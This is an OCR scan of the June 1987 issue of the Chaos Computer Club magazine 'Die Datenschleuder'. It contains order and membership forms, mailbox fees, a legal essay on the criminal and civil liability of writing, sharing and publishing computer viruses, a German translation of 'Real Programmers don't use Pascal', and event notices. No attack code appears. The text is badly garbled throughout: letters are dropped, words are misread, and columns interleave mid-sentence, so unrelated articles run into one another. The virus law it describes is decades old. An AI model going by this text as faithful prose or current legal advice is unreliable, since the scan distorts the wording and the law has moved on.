auf dem Juristensymposium gegen Kritik ratungsdienst GmbH, Heidenkampsweg 44, 2 HH 1, Tel. vom Podium und aus dem Zuhieikreis wehren. Auf der 040/23607167) das Angebot einer Komplettlsung. DieFiima ONLINE-Tagung wurde hart diskutiert, u.a. auch Uber Kids, Bertelsmann hat alle zur CD-ROM Produktion notwendigen die leider von einem Zuhrer als "Feinde" dargestellt wurden, Fachleute und Produktionsstuen, angefangen von der Anada sie die Statistik verflschten, wenn sie Datenbankenablyse des Problems Uber die Hard- und Softwarelsung bis zur fragen starteten, die keinen wirtschaftlichen Recherchegrund CD-Produktion und dem folgenden Vertrieb unter ihrem haben. Andererseits gab es vom Auditorium durchaus ZuKpnzem-Dach. Der Kunde mu im Grunde nur noch das Geld stimmung zu der Aufgabe gerade die Kids und Freaks als mitbringen. Kunden von morgen heranzuziehen. Die Deutsche Bundespost macht gerade "Klein-" Benutzern jedoch schnell einen Strich durch solch schne Rechnungen. Sie erhhte zum 1. April 87 die (Datex)Gebhren. Mit etwas Kleingedrucktem wurde dem Benutzer der 50 (bzw. 75) Sekunden-Takt mitgeteilt. GlobalbestelUetzen Ausgabe Juni 19B7 Mit Erscheinen dieses Besletlietzens aerlieren alle alten Versionen ihre Gltigkeit. Wir bitten, knftig nur noch den ieu/eils aktuellen Fetzen zu benutzen.

Die Datenschleuder
Die (olgenden altEn Ausgaben der Datenschleuder sind noch in unterschiedlicher Stckzahl erhltlich. Bei der Bestellung gilt das Faustrecht, wer zuerst kommt, mahlt zuerst Gehen mehr Bestellungen ein, als Restexemplare vorhanden sind, gibts ersatzweise Auftiacker unserer Wahl. Stckpreis Anzahl Summe 2.50 Datenschleuder Ol Der CCC stellt sich uor / Hardware ifflr Hacker / Die Hacker - Hsmine 2.50 Datenschleuder 02 Hack mal wieder / Modem ohne Otlenbarungseid 2.50 Datenschleuder 03 Uessen ft Prlen / BTX heisst Bildschirmtrii 2.50 Datenschleuder 04 Teleboic i Oltravollstndiges maximegalomanisches Worterbuch aller Sprachen 2.50 Datenschleuder 05/06 Computer Tutorial / Packet Radio 2.50 Datenschleuder 08 Rat Kr Piraten/ Postprisatz / SchrumptBlhfcWrfel 2.50 Datenschleuder 09 /10 DF-Grunzlagen / CCC '84 - Nachlese 2.50 Datenschleuder 11 /12 Kennwort Hackfete / Computerkrimmalitt / Ans lr Amateurfunk ? 2.50 Datenschleuder 15 Wo bitte gibts ne NUI ? / Trara - die Post ist da ! / WiKG 2.50 Datenschleuder 16 Hilie Hacker / CCC - Satzung / NUI off 2.50 Datenschleuder 17 CCC '86 / ComputerVirus 'Rush hour" / Kompromittierende Abstrahlung 2.50 Datenschleuder 18 Computerviren - Dokumentation / DPA hackt / Volkszhlung '87 2.50 Datenschleuder 19 CeBit / Art wer ? / Volksqulung/ Modem-Chips 2.50 Datenschleuder 20 e / Erbsubstanz in der Rasterfahndung / Maschmenpersoprfprogramm

Datenschleuder - Abos
Gelten fr jeweils ein Chaos - Jahr und umlassen etwa acht Ausgaben, sofem nicht hhere Gewalt anders entscheidet CCC - Mitglieder erhalten die DS automatisch, mssen also nicht abonnieren, drfens aber zwecks Aufbesserung unserer Kasse. Sozialabo fr Schler, Studenten, Azubis, Renter, Wehrpflichtige, 30.00 Ersatzdienstler und sonst sozial Benachteiligte Standardabo fr Otto - Normaluser 60.00 Frderabo fr Gutbetuchte 120.00

I>l
Die Firma "Wer liefert was?" GmbH (Postfach 100549,2 HH 1, Tel. 040/251508-0) hatte nicht nur das Geld, sondern auch die Idee und das Datenmaterial. Sie vertreibt schon in der zweiten Auflage (2000 SL; l.Aufl. 150 Sl.) ihr Buch auf CD-ROM fr jeweils 1.950 DM.

Schade, da sich in vielen Fllen - wie meistens auf solchen Messen - interessante Veranstaltungen berschnitten. Alles kann man nicht sehen und aufnehmen, schon gar nicht in einem solchen Text wiedergeben, Trozdem hoffe ich, da der Bericht dem Leser einige Aufschlsse ber die momentane Situation auf dem ONLINE-Markt gegeben hat. und anregt, am Ball zu bleiben. A.Eichler

Summe dieser Seite

Seite 8

Numero 21 - Juni 1987

>nfciicirf)(ciiber

? i t SnlcnSdilciibcr

Numero 21 - Juni 1987

Seite

Stnckoreis Anzahl Summe D i e H a c k e r b i b e l , Teil Eins 33.33 Das unentbehrliche Nachschlagewerk fr Hacker und solche, die es w e r d e n wollen. T e i t e von und fr Hacker, Dokumentation, Meinungen, Lebenshilfe, Lesespass. Aus dem Inhalt: das Basic-Gefhl * Neues vom C C C 1 Der Code des HaSpa - Coups * Computer & totalitrer Staat * Satellitenbacking 1 und * und * u n d . . . 260 Seiten D i n A l I S B N 3-922708-98-6 Grner Z w e i g S t u d i e fr den geplanten Computeremsatz der Fraktion ' D i e Grnen' im Auftrag des Deutschen Bundestages 'Die Einfhrung der Computertechnik gestaltet sich fr die Grnen im Bundestag so schwer, wie lr andere der Ausstieg aus der Atomindustrie. Fr beide seht es an die Strukturen.' R e c h t s f i b e l fr den richtigen Umgang mit der Polizei und anderen Amtspersonen sowie Institutionen. Ein Ratgeber fr Alle, die bei Wahrnehmung ihrer demokratischen Rechte den richtigen Umgang mit staatlichen Organen ben wollen. 120 Seiten D I N A6 I S B N 3-88012-679-8 VMB 7.50
1

Mitgliedschaft im Chaos Computer Club e.V.


Betrag Jahresbeitrag fr Schler, Studenten, pipapo Jahresbeitrag fr Otto Nrmaluser Jahresbeitrag fr besonders Finanzstarke (frderndes Mitglied) 60.00 i 120.00 | ab 240.OD | 20.00 | Summe I J | |

Einmalige Verwaltungsgebhr bei Eintritt

Mitglieder des CCC erhalten automatisch die Datenschleuder zugesandt und sind aufgefordert, aktio an der Arbeit des Vereins teilzunehmen. Die Mitgliedschaft im CCC berechtigt zur Inanspruchnahme verbilligter Accounts auf der INFEX Mailbox sowie zum Zugriff auf die Clubbretter der CLINCH Mailbox. Fr alle Veranstaltungen des CCC wird ermigter Eintritt gewhrt Teilnahme an der I N F E X - M a i l b o x Einmalige Eintragungsgebhr Mindestnutzung pro Monat VerMndungsgebhr pro Minute Jede versandte Nachricht Datenbank, Telex, Intermail 8.00 0.15 0.07 nach Nutzung 20.00 | |

5.00

Was Sie gegen Mikrozensus und VoUcszzblung tun knnen.


Ein praktischer Ratgeber fr alle, die sich mit der Volkszhlung und den damit verbundenen Rechtsproblemen beschftigen. 300 Seiten D I N A6 2001 Verlag 18061

5.00 Die I N F E X ist ein kommerzielles Milhaxssrsterii mit acht parallelen Ports, d.h. acht Benutzer knnen parallel im System arbeiten und die GeoNet - Dienstleistungen nutzen, zum Beispiel Datenbankdienste, Telexversand und - Empfang, Intermail zu anderen GeoNet - Boxen, von und nach BTX, etc. Die in der Box verursachten Gebhren werden direkt mit dem C C C abgerechnet, wir geben alle Gebhren zum 25.00 mit Infex bestens bedient. Selbstkostenpreis weiter. Wer einen preiswerten Anschlu an die kommerzielle Mailboxszene sucht, ist

Inlopaket 1 - Computerviren Eine Dokumentation von S.Wemery , die das Thema Computerviren ausfhrlich beleuchtet Das Infopaket besteht aus einer MS-Dos Diskette 5 1/4" mit einem Demo-Virus sowie 100 kB Dokumentaonstene.

Teilnahme an der C L I N C H - M a i l b o x Einmalige Eintragungsgebhr 10.0[ 2.00| 5.00 nach Nutzung das versuch? eine Monatsgebhr fr Schler etc. Monatsgebhr fr Normaiverdiener Intermail, Tele, etc

Aufbacker 'Achtung, Abhrgeiahr'


Din A4 - Bogen mit 64 Backern, ungeschnitten, postgelb

3.33

Die C L I N C H - MailboK ist ein nichtkommerzielles Mailboxpiojekt Bitte bei allen Bestellungen beachten; Alle Antragen an den CCC etc. nicht zusammen mit der Bestellung auf uns loslassen, sondern mit getrennter Post schicken, das beschleunigt zumindest die Bearbeitung der Bestellung. Beigelegter Rckumschlag beschleunigt noch mehr, wenn selbiger auch noch ausreichend frankiert ist. kann es passieren, dal es teuflisch schnell geht Manche Sachen sind manchmal nicht oorrtig. Wir erfllen dann die Bestellung soweit als mglich und legen den Rest zurck, bis Material da ist Achtet bitte auf schnste Sonntagschrift, wenn Ihr Eure Adresse nicht mit dem Drucker / Stempel anlertigt. wir haben keine Zeit, dauernd mit den Fetzen in die Apotheke zu rennen. Sendungen mit besonderer Versendunssform 1 Einschreiben. Nachnahme, etc) wurden ran nns grundstzlich weder erschickt noch angenommen, es sind grundstzlich nur die im Bestellletzen aufgefhrten Zahl weisen zulssig.

preiswerte Alternative zu den kommerziellen Systemen zu sein. EJerzeit stehen ein Telefon- und ein Datex-Port zur Verfgung, die wahlweise genutzt werden knnen. Die Leistungen der C L I N C H - Box sind ein Subset der Leistungen von GeoNet - Boren, soweit dies auf einem MS-Dos - System machbar ist. Die Abrechnung der Nutzungsbeitrge erfolgt direkt mit der C L I N C H - Box. C C C - Mitglieder erhalten Zugriff auf spezielle Bretter, die dem normalen Nutzer nicht zur Verfgung stehen. Der C C C wickelt ber die Box Koordinierungsaufgaten des Vorstands und der Redaktion der Datenschleuder ab.

Seite 10

Numero 2K-Juni 1987

SnfcnStijlcuhct

^ ^ c

Smtciirijlciibcr

N u m e r o 21 - Juni 19?,7

Seite 11

Historische Fehler Bestellfetzen 1987

Personentogen
Name Vorname Strae / Hausnummer Postleitzahl / Ort
Bei Beitritt in den CCC sind zustzlich die folgenden Angaben zu machen:

Das dezimale Zahlensystem enstand aus einem unglcklichen Fehler unserer Weisen, die den Daumen irrtmlich fr einen Finger hielten, obwohl der Schpfer es tatschlich so gemeint hatte, da jede Hand eine hexadezimale Zahl darstellt. In der Schule werden uns bezugslose Betrachtungsweisen aufgezwngt, wobei die Tatsache vllig auer acht gelassen wird, da wir, als wir als Kinder mit Baukltzen spielten, eine natrliche Zuneigung zu Stack-Operationen entwickelt haben. Jedes Kind kann uns triumphierend beweisen, da nur an der Spitze des Stack ordentliche Operationen mglich sind, whrend der Zugriff auf den Stapelboden Chaos verursacht. Die Darstellung der Welt als unendliches Kontinuum von Fliekommazahlen ist eine weitere Zerstrung menschlicher Traditionen. Es hat niemals Schwierigkeiten verursacht, einen Kuchen zwischen drei Kindern zu teilen, bis uns die Mathelehrer eintrichterten, da jedes K i n d ein unendliches Dezimalbruchteil des Kuchen kriegen wrde und die Computer anfingen, uns vorzurechnen, da die Summe dieser drei Kuchenstcke nicht den ganzen Kuchen geben wrde. Anstatt sich mit der Lsung wirklicher Probleme zu beschftigen, ist der menschliche Mathematiker besessen von der Idee, irrationale Zahlen zu berechnen, zum Beispiel die Zahl Pi. Fr die alten Hebrer reichte es vllig aus, Pi gleich drei zu setzen, um den Zweiten Tempel zu bauen, und wenn man den rationalen Bruch 355/113 benutzt, kann man Moskau auf drei Meter genau lokalisieren. Die Tatsache, da der Computer die Welt als Menge einzelner endlicher Ganzzahlen sieht, stellt eine stndige Ursache fr die Schwierigkeiten der Menschen dar. Sie reden von Rundungsfehlern und knnen nicht verstehen, warum der I B M 4341 mit Taylor-Erweiterung und doppeltgenauer Arithmetik den Sinus von 2910 mit 49902.58337544370990 errechnet, wenn das eigentliche Ergebnis 0.5 lauten mte. | Aus: Israel Urieli, ' R E P T I L - promoting dialog between humanoid and C o m p u t e r ' , The Journal of Frth Application and Research, VOL.4/No.2 Deutsche bersetzung: R.Schrutzki. bernommen aus CLINCH. LS23

Geburtsdatum Telefon
Bei Teilnahme a n der INFEX cder CLINCH - Box ?ind zusatzlich die folgender. Ar.saber. r.acher.

Benutzername Passwort zur Facheinrichtung Hillszeile


Bei Benutzernamen und Passwort sind nur alohanumerische Z e i c l ^ n A-S, 0-9, sowie Satzzeichen Punkt und Bindestrich zulssig. Leerzeichen ist unzulssig.

V
I F A Sysoptreffen
Zur Internationalen Funkausstellung in Berlin findet ein internationales Sysoptreffen statt. Zwei Tage, vom 29.08. bis 30.08.87, treffen sich Mailboxbetreiber zumlnformationsaustausch. Der IPN (Verein von Sysops), C C C , C A C und B H P , gestalten unter anderem das zweitgige Informations-und Tagungsprogramm. Veranstaltungsort ist der Mehringhof in Berlin. Samstag, 28.08. ab 15 Uhr: Vorstellung von I P N , Referate ber diverse Netzkonzepte, ab 21 Uhr: Internationale Hackerfete. Sonntag, 30.08. ab 10 Uhr: Technische und rechtliche Beitrge (Fernmelderecht, Presserecht u.a.), weitere Mailboxkonzepte, Diskussionen bis 16Uhr. Dienstag, 01.09. um 16 Uhr: Hackertreff am Poststand. Klnschnack und Diskussionen mit Vertretern des Gelben Riesen. Anmeldung bei: IPN - H.Nopper, Brusendorfer Str. 20, D-1000 Berlin 44 Bitte gebt an mit wieviel Personen ihr kommt und wieviel Schlafpltze wann gebraucht werden!

Und jetzt noch das dicke Ende: Bitte die Summen aller Seiten des Bestellietzens addieren und hier eintragen. Meine Bestellung hat den Gesamtwert von DM

Ich zahle diesen Betrag BarQ in Postwertzeichen Q per V - Scheck Q per berweisung | | (Zutreffendes markieren, andere Zahlweisen sind grundstzlich nicht mglich} Meine Mitgliedsbeitrge fr den C C C werde ich knftig wie folgt zahlen: BarlH] 1/4 - jhrlich Q per V - Scheck d l 1/2 - jhrlich per berweisung C H jhrlich

Und zwar

So. Und nun bitte die Bestellseiten heraustrennen ( sie sollte, wenn alles klappt, ohne Verlust wertvoller DS - Texte aus der Mitte heraustrennbar sein ) , in einen Umschlag tten und frankiert absenden, und zwar an uns: Chaos Computer Club e.V. Schwenckestrafle 85 2000 Hamburg 20 Die Kontonummer fr berweisungen ist: 59 90 90 - 201 beim Postgirosamt Hamburg, Bankleidzahl 20010020, Kontoinhaber ist der Chaos Computer Club e.V.

Seife 12

Numero 21 - Juni 1987

( J f ^ k

Sfl/ciiirfjfcnl>cr

SnfciiSifjIcwbcr

Numero 21 - Juni 1987

Seite 13

1. Entwicklung von Virusprogrammen. D i e Entwicklung und Programmierung von Virusprogrammen als solche ist grundstzlich rechtlich unbenklich.

4. Verffentlichung von Virusprogrammen Auch die Verffentlichung von Virusprogrammen, z.B. in Mailboxen oder Zeitschriften, ist ebenfalls grundstzlich unbedenklich mglich. Aber auch hier ist dennoch Vorsicht geboten! Wenn mit der Verffentlichung die (evtl. nur versteckte) Aufforderung verbunden wird, den Virus in strafbarer Weise einzusetzen, kommt eine Strafbarkeit wegen ffentlicher Aufforderung zu Straftaten (111 StGB) in Betracht. Dies htte auch zur Folge, da zivilrechtlich fr einen entstandenen Schaden mitgehaftet wrde. Weiter kommt unter bestimmten Umstnden eine Haftung auf Schadensersatz auch dann in Betracht, wenn der Empfnger des Virusprogramms sich aufgrund unterbliebener oder unzureichender Aufklrung, durch unsachgeme Handhabung des Virusprogramms, selbst schdigt.

Real Programmers don't use P A S C A L Teil I I

2. Einsatz von Virusprogrammen Viren nisten sich in noch unverseuchte Programme ein. Ein bisher unverseuchtes Programm, das von einem Virus befallen wird, wird daher durch den Virusbefall verndert, selbst wenn das Programm weiterhin fehlerfrei luft und auch ein sonstiger Schaden nicht eintritt oder feststellbar ist. Die Vernderung von fremden Daten (und Programme sind natrlich auch Daten!) ohne Einwilligung des Berechtigten reicht aber fr den Tatbestand des 303a S t G B (Datenvernderung) aus, soweit die Tat vorstzlich erfolgte. Die Datenvernderung nach 303a S t G B kann mit bis zu 2 Jahren Freiheitsstrafe oder Geldstrafe geahndet werden. Jedenfalls bei vorstzlichem Viruseinsatz ist fr den entstandenen Schaden Ersatz zu leisten. Hierbei knnen leicht unberschaubare S u m m e n Zustandekommen, die kein Schdiger zu Lebzeiten mehr vollstndig abtragen kann! Soweit die Schdigung nur fahrlssig erfolgte, ist die rechtliche Situation problematisch. Vgl. hierzu den Volltext in C L I N C H oder der H A C K E R B EBEL, Teil 2.

Virjus Rechtliche Aspekte von C o m p u t e r viren


Computerviren sind heute ein hei diskutiertes Thema. Sie waren Zentralthema auf dem C C C '86, dessen Dokumentarien von Steffen Wernery in der DATENSCHLEUDER 18 abgedruckt wurde. Wegen ihrer zunehmenden Brisanz sind Computerviren aber auch ein beliebtes Thema sowohl der Computerfachpresse wie auch der allgemeinen Presse geworden. Hierbei geht es fast immer ausschliesslich, oder doch ganz berwiegend, um die rein technischen Fragen der Computerviren. Fragen wie: Was ist ein Virus, wie wird er programmiert, wie wird er angewendet, und, nicht zuletzt natrlich, wie kann man sich vor Computerviren schtzen. D i e Frage welche rechtlichen Konsequenzen sich aus Programmierung, Anwendung etc. von Viren ergeben kann, wird weitgehend unbeachtet gelassen oder n u r kurz und unvollstndig am Rande behandelt. D i e s ist der Grund, warum ich eine Studie ber die rechtlichen Aspekte von Computerviren verfat und, anllich des CCC-Virenforums Ostem '87 im Brett Virenforum von C L I N C H , verffentlicht habe. D a nicht jeder die Mglichkeit hat, sich dort den Text per download herauszuziehen, ein Abdruck des Textes bei einer L n g e von knapp 60 k B den Umfang der vorliegenden D A T E N S C H L E U D E R aber gesprengt htte, ist es vorgesehen, die Studie in der voraussichtlich i m Herbst erscheinenden H A C K E R B I B E L , Teil 2, abzudrucken. Wegen des groen Interesses, gerade unter den Programmierern von Virusprogrammen, aber schon hier die wichtigsten Ergebnisse in stark gekrzter Fassung: Seite 14 Nui

W o lebt der typische Richtige Programmierer? Was fr eine Art von Programmen sind solcher talentierter Individuen wrdig? M a n kann sicher sein, da sich kein Richtiger Programmierer totschreibt an einem Programm fr Konto-Auenstnde in COB O L , oder einem Maillist-Sortierprogramm fr das 'People'-Magazin. Ein Richtiger Programmierer braucht Arbeiten von erderschtternder Wichtigkeit. Richtige Programmierer arbeiten fr das Los Alamos National Laboratory die und auf schreiben Cray IAtombomben-Simulationen,

Supercomputem laufen. Sie arbeiten auch fr die National Security Agency und decodieren russische Funksprche. Es war eine groartige Belohnung fr die Anstrengungen tausender Richtiger Programmierer bei der N A S A , da unsere Jungs vor den Kosmonauten auf den M o n d und wieder zurck gekommen sind. Die Computer im Space Shuttle sind von Richtigen Programmierern programmiert, und diese wahren Profis sind auch bei Boeing an der Arbeit, um Steuerungssysteme fr Cruise Missiles zu entwerfen. Einge der ehrfurchtgebietendsten Richtigen Programmierer arbeiten im Jet Propulsion Laboratory in Kalifornien. Viele von ihnen kennen das gesamte Betriebssystem der Pioneer- und Voyager-Sonden wie ihre Westentasche. Mit einer Kombination von groen, in der Bodenstation verfgbaren FORTRAN-Programmen und kleinen, in den Rechnern der Sonden untergebrachten AssemblerProgrammen knnen sie unglaubliche Knststcke an Navigation und Improvisation vollbringen - wie etwa nach sechs Jahren i m All zehn Kilometer groe 'Fenster' am Saturn zu treffen, oder beschdigte Sensor-Plattformen, Funkgerte oder Batterien zu reparieren oder zu berbrcken. Einer der Richtigen Programmierer brachte es fertig, ein Bildverarbeitungsprogramm in einige hundert Bytes unbenutzten Speichers in einer der Voyager-Sonden zu quetschen, das anschlieend einen neuen Jupitermond suchte, lokalisierte und fotografierte.

Ich empfehle daher bei einer Verffentlichung von Virusprogrammen folgende Vorsichtsmanahmen unbedingt zu beachten: a) Alles vermeiden, was darauf hindeuten knnte, da in der Verffentlichung des Programms eine Aufforderung zu dessen strafbarem Einsatz liegt. b) Unbedingt deutlich und unmiverstndlich auf die Gefhrlichkeit des Programms hinweisen und mitteilen, wie der Anwender mit dem Programm umzugehen hat, um eine Selbstschdigung oder Schdigung Dritter zu vermeiden.

3. Weitergabe von Virusprogrammen Grundstzlich spricht nichts dagegen, Vinisprogramme im Quellcode oder als lauffhige Version, an Dritte weiter zu geben. Aber Vorsicht!!! Wennder Abnehmer des Virusprogramms das Programm in strafbarer Weise einsetzt, kann sich auch der Programmierer strafbar machen. Z.B. nmlich wegen Anstiftung dann, wenn er (mglicherweise nur in versteckter Form) dem Abnehmer den Vorschlag gemacht hat, das Programm in strafbarer Weise einzusetzen. Oder wegen Beihilfe, wenn der Programmierer Anhaltspunkte dafr hatte, da der Abnehmer des Programms dies zu einer Straftat einsetzen wrde. In diesen Fllen wrde der Programmierer auch zivilrechtlich fr den entstandenen Schaden (mit)haften. Und zwar in voller Hhe! o 2 I - Juni I 9 8 7 ^ J ^ j p i c Sotcnddjlciibcr

St. Ackermann, Hamburg

Sfllcndrijlcnkr

Numero 21 - Juni 1987

Seite 15

Ein Plan fr die Galileo-Sonde geht dahin, auf dem W e g zum Jupiter eine Gravitations-Ablenkung hinterdem Mars zu benutzen. Diese R o u t e verluft, +/-3 Kilometer, 80 Kilometer ber der Marsoberflche. KeinMensch wird sich fr diese A r t v o n Navigation einem Pascal-Programm oder -Programmierer anvertrauen. Viele der Richtigen Programmierer arbeiten fr das U.S. Gouvernment, vor allem fr das Verteidigungsministerium. Das ist so, wie es sein soll. Vor kurzem hat sich eine schwarze W o l k e a m Horizont der Richtigen Programmierer zusammengeballt. Es scheint, da ein paar hhergestellte Mslifresser im Verteidigungsministerium entschieden haben, da alle Verteidigungsprogramme in einer groen vereinheitlichten Sprache namens A d a geschrieben des werden sollen. Fr eine W e i l e schien es, als o b A d a ausersehen worden wre, smtliche Regeln eine Sprache mit Struktur, Datentypen, Richtigen Programmierens nichtig zu machen. Es ist Groschreibung und Semikolons. K u r z gesagt, wie geschaffen, die Kreativitt des typischen Richtigen Programmierers zu verkrppeln. Glcklicherweise hat die Sprache, derer sich das Department o f Defense angenommen hat, gengend interessante Features um sie annehmbar zu machen - sie ist unglaublich komplex, beinhaltet Methoden, um Schweinereien mit dem Betriebssystem anzustellen und Speicher nachtraglich einzurichten, und Edgar Dijkstra mag sie nicht. Dijkstra, wie man wissen mu, verfate ' G O T O s Considered H a r m f u l ' , ein Meilenstein der Programmiermethoden, Nebenbei, ein Richtiger auf die kann Pascal-Programmierer und MUslifresser abfahren. Programmierer

putergraphik in F O R T R A N gemacht, soda esLeute gibt, die Graphik machen nur um dem C O B O L Programmieren aus dem W e g zu gehen.

Von Menschen u n d Musen Bestellunwesen u n d a n d e r e Kleinigkeiten

Daraus entstehen Sachzwnge, die uns veranlassen, nach bestimmten Spielregeln vorzugehen, damit mglichst viel Leute mglichst wenig Arbeit haben. Diese Spielregeln werden nur leider allzugerne vergessen , obwohl wir sie immer wieder bekanntgeben. Hier nochmal Auszge aus den Chaos-Regeln, dero gtigster Gewogenheit des p.t. Publicum zur geflissentlichen stellt: Beachtung submissest anheimge-

I m allgemeinen spielt der Richtige Programmierer a u f die selbe Weise wie er arbeitet - mit Computern. Es amsiert ihn unausgesetzt, da sein Auftraggeber ihn fr das bezahlt, was er ohnehin zu seinem, Vergngen tun wrde, obgleich eres natrlich sorgfltig vermeidet, seine Auffassung laut zu uern. Gelegentlich geht der Richtige Programmierer aus dem Bro, um ein wenig frische Luft zu sich zu nehmen, oder ein oder zwei Bier. Hier ein paar Tips, u m Richtige Programmierer auerhalb eines Rechenzentrums zu erkennen: Zunchst eine allgemeine Bemerkung zur Situation: Es scheint landauf, landab die Meinung vorzuherrschen, hier im Norden der Republik se eine Hundertschaft hauptamtlicher Chaoten, die rund u m die U h r in der Schwenckestrasse 85 hocken und nur darauf warten, da endlich mal eine Bestellung hereinkommt, die dann binnen weniger Picosekunden erledigt wird. Hier liegt offenkundig eine Verwechslung mit einem ebenfalls in der frohen und Hansestadt -Auf Parties sind die Richtigen Programmierer diejenigen in der Ecke, die ber Betriebssystemsicherheit plaudern, und wie man sie umgehen kann; -Bei einem Fuballmatch ist der Richtige Programmierer derjenige, weicherden Spielverlauf mit seiner Simulation, gedruckt auf griinweissem Endlospapier, vergleicht; -Am Strand ist der Richtige Programmierer der, der Flowcharts in den Sand zeichnet; -Ein Richtiger Programmierer geht in eine Discothek, u m sich die Lightshow anzusehen; -Bei einem Begrbnis ist der Richtige Programmierer derjenige, der sagt: " A r m e r George. Und er hatte die Sonierroutine kurz vor der Vollendung." -In einemLebensmittelgeschft ist der Richtige Programmierer deijenige, der darauf besteht, seine Dosen selbst an dem Barcode-Scanner vorbeizuschieben, weil er nicht daran glaubt, da Lochkartentippsen es die ersten M a l e richtig machen.
i Die A r b e i t me*

Datenschleuder - Abos:

D i e Abos gelten fr jeweils acht Ausgaben, weil wir nicht garantierenknnen, innerhalbeines Jahres eine bestimmte Anzahl von Ausgaben zu produzieren. Das hat sich soweit auch bewhrt und bisher ist noch niemand zu kurz gekommen; eher im Gegenteil. A u f dem Aufkleber, der sich auf der Rckseite der D S befindet, ist eine Nummer, die einerseits uns hilft, den Abonennten in der Datei wiederzufinden. Andererseits hat die Nummer auch fr den Abonnenten einen geistigen Nhrwert: Die letzte Zahlengruppe gibt an, bis zu welcher Ausgabe das A b o noch besteht. Dabei sind alle Zahlungen bercksichtigt, die uns bis z u m Druck der Aufkleber am Versandtag erreicht haben. W e r die letzte Ausgabe seines Abos zugeschickt kriegt, erhlt kurz darauf nochmal Post von uns, in der wir darauf hinweisen, da das A b o abluft. Wer dann immer noch der Meinung ist, er mu nicht mit weiterer Kohle rberriieken, wird automatisch aus der Datei gelscht, wenn die nchste D S z u m Versand ansteht. Das sind ungefhr sechs Wochen nach Erhalt der Mahnung. W i r knnen uns den blichen W e g nicht leisten, der so aussieht, da das Abo fortgefhrt wird, und die Kohle ber Mahnverfahren reinkommt. W i r halten unsere Methode eh fr fairer.

ansigen

Versandunternehmen

('Chaos ? - Find ich gut...') vor. Das Gegentum ist der Fall, wie wir zu unserem Leidwesen immer wieder feststellen mssen. Bestellungen, die per Post, per Bldeltext oder telefonisch eingehen, gibt es reichlich. Woran es uns fehlt, sind Leute, die das auch zgig bearbeiten knnen. W i r haben auer dem C C C noch jeder einen Brotberuf, der uns schonmal acht Stunden von der Postbearbeitung abhlt, ab und zu wollen wir ein wenig ausruhen ("catch some sleep between two compiles..."), und auch mal Zeit fr uns selbsthaben. brig bleibt ein Huflein von vier Leuten, die versuchen, alles im Gang zu halten und ihr Bestes zu geben. Oft genug k o m m t es vor, da eine offene Rechnung aus eigener Tasche bezahlt wird, ohne einen Gedanken daran, das ganze spter wieder einzufordern. D i e chaotische Datenverarbeitung findet derzeit auf dem privaten P C eines Mitglieds statt, da uns die M u s e fr einen Verwaltungsrechner fehlt und wir, i m Gegensatz zur verbreiteten Legende, uuch nicht ber ausreichende Kontakte zur spendierfreudigen Industrie verfgen.

FORTRAN-Programme in jeder Sprache schreiben. Der Richtige Programmierer kann einen Kompromi mit seinen Prinzipien eingehen und an geringfgig trivialeren Dingen als der Zerstrung des Lebens arbeiten, vorausgesetzt, dabei ist genug Geld zu holen. Es gibt einige Richtige Programmierer, die beispielsweise bei Atari Videospiele programmieren. Aber sie spielen die Spiele nicht. Ein Richtiger Programmierer wei, wie man die Maschine zu jeder Zeit schlagen kann, und da darin keine Herausforderung steckt. Jeder, der bei LucasFilm arbeitet, ist ein Richtiger Programmierer, denn es wre verrckt, das Geld von 50 Millionen Star Wars-Fans sinnlos zu verplempern. Der Anteil von Richtigen Programmierern in der Computergraphik ist etwas niedriger als die Norm, groteils weil noch niemand herausgefunden hat, wofiir Computergraphik ntzlich sein knnte. Andererseits ist die g a n z e C o m N u m e r o 21 - Juni

ivachsene \

1 ^

Seite 16

987

( j ^ r S i e >n(eiid)Icui>cr

S>(lfcii8rf)fciibcr

Numero 21 - Juni 1987

Seite 17

Mitgliedschaft i m C C C :

Leuten zu fhren, mit denen wir nichts zu tun haben wollen. Dazu gehren die notorischen Einschreiber und hnlich nervttende Spezies, weil wir einfach

Grummel Denkvorgnge m a d e in GermanyAnlass z u m Schreiben dieses Artikel war fr mich die Situation an einer A m p e l . D i e A m p e l verwaltete gerade noch ca. 1.50 m Fussgngerweg. Das ist in Anbetracht der Tatsache, da da eine Baustelle war, nichts wunderliches. Nachdenklich gemacht haben mich erst jene Leute, die 2 Minuten warten, bis sie die 2 Schritte mit offizieller Genehmigung (=grn) zurcklegen. Das Denken wird also der A m p e l berlassen (knstliche Intelligenz?). D i e Ursachen fr solche Alltagskrankheiten im

Geld per Fingerabdruck

W i r tragen Euch erst dann in die Liste ein, wenn die Aufnahmegebhr und der Beitrag fr mindestens ein Vierteljahr entrichtet ist. W i r verschicken im allgemeinen keine Besttigung der Mitgliedschaft. Die erfolgte Eintragung erkennt ihr am Aufkleber Eurer D S : W e n n da als letzte Z a h l 999 steht, bekommt ihr das D i n g im R a h m e n der Mitgliedschaft oder eines Austauschabos. W i r gehen davon aus, daS unsere Mitglieder an ihrem Wohnort selbst aktiv werden und stehen persnlich und telefonisch gerne zur Verfgung, wenns u m chaotypische Veranstaltungen geht. Schriftlich wre das alles zuviel Aufwand.

nicht dauernd zur Post rennen wollen, u m irgendeinen Schmachtfetzen abzuholen, der eh irrelevant ist. Sowas ignorieren wir nach dem biblischen Motto 'Auge u m Auge...'. W i r verschicken schlielich auch keine Einschreiben. Achja, Schecks: W i r reichen Schecks in dem Augenblick zur Gutschrift ein, wo wir mehr als die Hlfte der Bestellung erledigt haben. Beispiel: Jemand wird Mitglied, bestellt die Virendisk und legt einen Scheck ber 165.00 D M bei. W i r tragen ihn in die Mitgliederliste ein und er kriegt ab sofort die D S mit der 999 im Aufkleber. D i e Virendisk kriegt er wahrscheinlich erst in zwei Monaten, die aktuelle D S etwas frher. W e n n wir jetzt warten wrden, bis er sowohl die Disk, als auch die erste DS gekriegt hat, wre der Scheck wahrscheinlich gar nicht mehr einziehbar. Folglich ziehen wir ihn in dem Augenblick ein, in dem die Daten in der Mitgliederdatei gelandet sind.

Berichtete die Hamburger Morgenpost (30.5.87) davon, da es nun endlich einen EC-Karten-Notruf in Frankfurt gibt (069/747700; Bank, B L Z , Konto-Nr., Kartennummer und Verfalldatum mssen genannt werden), so ist man in Amerika schon weiter. Dort wird ein Gert produziert, das erst nach positivem Fingerabdruck-Vergleich Geld rausrckt. Der Kund steckt einen Finger in den Geldautomaten, dieser schickt das Abdruckbild an die Zentrale und bek o m m t Antwort. (aus Capital, Juni 87)

